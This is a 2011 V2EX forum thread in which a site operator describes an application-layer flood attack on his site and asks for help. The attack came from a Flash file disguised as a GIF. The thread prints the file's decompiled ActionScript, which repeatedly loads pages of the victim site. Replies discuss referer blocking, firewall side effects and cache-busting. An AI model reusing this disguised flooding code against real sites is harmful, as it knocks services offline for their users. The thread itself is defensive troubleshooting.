V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
rety2008
V2EX  ›  问与答

网站被人攻击了。方法很奇特

  •  
  •   rety2008 · 2011-01-08 21:52:51 +08:00 · 6830 次点击
    这是一个创建于 5067 天前的主题,其中的信息可能已经有所发展或是发生改变。
    此人在某个流量比较高的网站挂了一个GIF图。

    打开后是红叉。

    我下载到本地。 发现是用SWF伪装成的GIF

    反编译后代码如下



    loadMovieNum ("http://bbs.xxx.com/space.php?uid=680064", 1115191);
    loadMovieNum ("http://www.xxx.com/home.php", 1115192);
    loadMovieNum ("http://home.xxx.com/space.php?uid=2185", 1115193);
    loadMovieNum ("http://www.xxx.com/group.php", 1115194);
    loadMovieNum ("http://bbs.xxx.com/archiver/index.php?tid-658710.html", 1115195);
    loadMovieNum ("http://bbs.xxx.com/task.php?action=apply&id=20", 1115196);
    loadMovieNum ("http://mp3.xxx.com/hot.php", 1115197);
    loadMovieNum ("http://home.xxx.com/index.php", 1115198);
    if (_root._url.indexOf("img.xxxxxxxx.com") == -1) {
    i = 1;
    while (i <= 1000000000000 , i++) {
    getURL ("http://www.taobao.com");
    }
    } else {
    play();
    }


    xxx.com 是我们的网站。。


    只要访客访问到他网站上的这个GIF图。就会不停的读取我们网站的数据。导致各频道频繁卡死。

    各位有办法么
    19 条回复    1970-01-01 08:00:00 +08:00
    shellex
        1
    shellex  
       2011-01-08 21:55:56 +08:00
    从flash过来的请求,Referer是多少?还有SourceIP也可以看到
    rety2008
        2
    rety2008  
    OP
       2011-01-08 22:03:51 +08:00
    IP比较多。。

    2分钟内就已经屏蔽了大概16000多IP了。

    基本都是QQ空间过来的。
    iugo
        3
    iugo  
       2011-01-08 22:05:56 +08:00
    呵呵,有点意思。不知道你阻止来自该网站的页面请求可以不。
    predator
        4
    predator  
       2011-01-08 22:19:42 +08:00 via iPod
    从log入手先把可疑的referer封了。
    simpx
        5
    simpx  
       2011-01-08 22:19:55 +08:00
    把referer是那个比较高的网站的流量都禁止了。不知道这样可以么?刚搜到http://www.cnblogs.com/rialover/archive/2010/10/29/1864313.html
    这篇文章测试了一下通过swf访问get访问url,在有些浏览器中是可以获得正常referer的。
    rety2008
        6
    rety2008  
    OP
       2011-01-08 22:31:28 +08:00
    目前解决办法是开启硬件防火墙。

    但是开启防火墙后

    QQ空间用户只要用了他网站上的这个FLASH做装饰的。

    就被当成攻击IP被屏蔽了

    现在已经屏蔽了几万个了。

    也就是很多QQ空间用户访问不了我们网站了
    Kymair
        7
    Kymair  
       2011-01-08 22:35:51 +08:00
    可以报案么?
    rety2008
        8
    rety2008  
    OP
       2011-01-08 22:48:47 +08:00
    看来只能报案了。
    shellex
        9
    shellex  
       2011-01-08 23:19:46 +08:00
    呵呵...app level的ddos,霸道无比。话说,既然是“用了他网站上的这个FLASH做装饰”,那直接溯源到“他网站”就好了。
    9hills
        10
    9hills  
       2011-01-08 23:54:04 +08:00
    这个很厉害
    GordianZ
        11
    GordianZ  
    MOD
       2011-01-09 00:03:48 +08:00
    就是cc攻击。要防的话就如#4 #5所说,ban referer可以从一定程度上解决,而且不会出现硬防IP导致QQ空间用户不能访问的结果。
    rety2008
        12
    rety2008  
    OP
       2011-01-09 00:40:57 +08:00
    谢谢各位。事情已经得以解决。

    找到源头后。联系了该网站的管理员。

    经确认,是网站内部技术人员所为。 已经撤掉这段代码。
    rety2008
        13
    rety2008  
    OP
       2011-01-09 14:40:38 +08:00
    现在有一个比较郁闷的事情。。

    就是他这个文件已经被很多用户的浏览器缓存。

    虽然服务器上已经去掉这个文件。 但攻击依然有一小部分存在。

    多数为用户缓存。 对方也在想办法, 如何设置才能把这些用户的缓存快速清理掉呢
    dc
        14
    dc  
       2011-01-09 15:08:43 +08:00
    @rety2008 让对方在图片链接后加任意时间戳,客户端下次访问时会刷新的。类似:xxx.gif?123
    napoleonu
        15
    napoleonu  
       2011-01-09 15:17:41 +08:00
    做doodle的人想秒掉哪个网站岂不是真的叫秒掉,我曾经幻想Google用此方法秒God Fucked Wall
    shellex
        16
    shellex  
       2011-01-09 16:21:59 +08:00
    @napoleonu 确实是幻想。
    xman
        17
    xman  
       2011-01-09 18:18:53 +08:00
    这是全部代码吗?
    summic
        18
    summic  
       2011-01-09 19:28:03 +08:00
    @xman
    你要做什么?
    silver0511
        19
    silver0511  
       2011-01-19 16:48:00 +08:00
    0 0
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2812 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 30ms · UTC 07:10 · PVG 15:10 · LAX 23:10 · JFK 02:10
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.